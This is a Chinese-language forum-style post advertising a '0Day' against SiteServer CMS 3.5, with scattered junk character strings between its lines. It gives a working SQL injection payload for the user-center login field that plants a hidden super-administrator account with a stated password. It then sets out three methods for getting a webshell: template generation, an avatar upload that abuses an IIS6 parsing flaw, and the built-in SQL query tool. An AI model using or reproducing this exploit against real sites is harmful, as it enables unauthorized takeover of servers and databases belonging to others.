SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
) k& y+ v* @4 P: u* f9 N
' B7 ^) X/ B8 h4 L9 F$ nstieserver官网:www.siteserver.cn

4 b! W9 S% P$ S; x" \

EXP:
7 }9 w0 {0 w/ X/ B+ C
直接访问UserCenter/login.aspx
- V5 Q4 c8 M5 X$ l9 P+ d. \3 \
4 e% O+ a# G  \( E
9 }- r* \9 k5 c- x- [
用户名处输入：

& o9 L4 v( J& H123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
0 n9 ?& V. A' ?  e" }# l4 Z- N, W: [* }
6 k" G! l9 Q; h2 S, F2 P0 i0 }  h

3 N* L: Z" Y6 |9 Y密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

) `: `6 V5 ~6 D8 v. n9 ]# ]

之后再访问后台SiteServer/login.aspx用插入的用户登陆
& d- ~  v% K9 ~# U* X* P/ N" L
$ K) `- q& z- Q' \
1 ^. m7 y4 Z+ ~- [0 U) a' o
后台拿webshell的三种方法：
* ]8 J2 Q' n8 Z& q# ?" _
# }9 E- Z6 H  U: v一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

4 c" ^* f& N' [( {8 m* L二、
: N* U7 u* z) E  n4 E* o
成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
. l- }4 l" A4 ?+ p: X) F; W% T! q
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
0 }0 m& p2 z; {$ l7 i
# ], p/ O) R& V- s三、
* {. U* Q% }6 h5 K1 p; r
系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径

系统工具-》数据库工具-》SQL语句查询
1 E9 M; `! ~6 d这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

1 w( F' \+ k7 {* {) ?. a) z" E